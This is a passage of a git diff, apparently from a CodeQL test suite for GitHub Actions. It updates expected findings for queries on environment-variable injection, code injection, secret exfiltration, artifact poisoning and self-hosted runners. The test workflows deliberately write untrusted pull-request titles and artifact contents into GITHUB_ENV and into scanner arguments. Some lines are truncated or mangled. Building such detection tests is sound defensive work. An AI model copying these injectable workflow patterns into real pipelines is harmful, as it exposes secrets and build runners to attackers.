\| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 785aaa383eb..50cb0c40d24 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,9 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | -| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$( { - return artifact.name == "oc-code-coverage" - })[0]; - let download = await github.rest.actions.downloadArtifact({ - owner: context.repo.owner, - repo: context.repo.repo, - artifact_id: matchArtifact.id, - archive_format: 'zip', - }); - let fs = require('fs'); - fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' - run: unzip oc-code-coverage.zip -d coverage - - name: set env vars - run: | - echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV - echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV - - name: SonarCloud Scan (PR) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD != 'develop' + - uses: sonarsource/sonarcloud-github-action@master env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} - -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} - -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 3fbc081a0f4..259746eaec9 100644 --- a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -1,22 +1,6 @@ edges -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | -| .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:34:9:39:6 | Run Step | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | nodes -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | semmle.label | Job: sonar [SONAR_BASE] | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | semmle.label | Job: sonar [SONAR_HEAD] | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | semmle.label | Job: sonar [SONAR_PR_NUM] | -| .github/workflows/test1.yml:12:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | semmle.label | env.SONAR_BASE | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | semmle.label | env.SONAR_HEAD | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | semmle.label | env.SONAR_PR_NUM | +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | ${{ env.SONAR_BASE }} | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | ${{ env.SONAR_HEAD }} | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | ${{ env.SONAR_PR_NUM }} | +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml new file mode 100644 index 00000000000..81d614e5122 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -0,0 +1,28 @@ +name: test + +on: + pull_request: + +jobs: + test1: + runs-on: [self-hosted, X64, Linux, 16c32g] + steps: + - run: cmd + test2: + runs-on: + group: my-group + labels: [self-hosted, label-1] + steps: + - run: cmd + test3: + runs-on: + - 'self-hosted' + - 'linux' + - 'x64' + - 'metal' + steps: + - run: echo "foo" + test4: + runs-on: self-hosted-azure + steps: + - run: cmd diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml new file mode 100644 index 00000000000..243bac92599 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml @@ -0,0 +1,26 @@ +name: test + +on: + push: + +jobs: + test1: + runs-on: [self-hosted, foo] + steps: + - run: cmd + test2: + runs-on: + group: my-group + labels: [self-hosted, foo] + steps: + - run: cmd + test3: + runs-on: + - 'self-hosted' + - 'foo' + steps: + - run: cmd + test4: + runs-on: self-hosted-azure + steps: + - run: cmd diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected new file mode 100644 index 00000000000..920a818ab35 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected @@ -0,0 +1,4 @@ +| .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:26:5:28:15 | Job: test4 | Job runs on self-hosted runner | diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref new file mode 100644 index 00000000000..43692e5ce43 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref @@ -0,0 +1,2 @@ +Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 429a4cdc0c5..3d1df408c3b 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -1,43 +1,43 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index 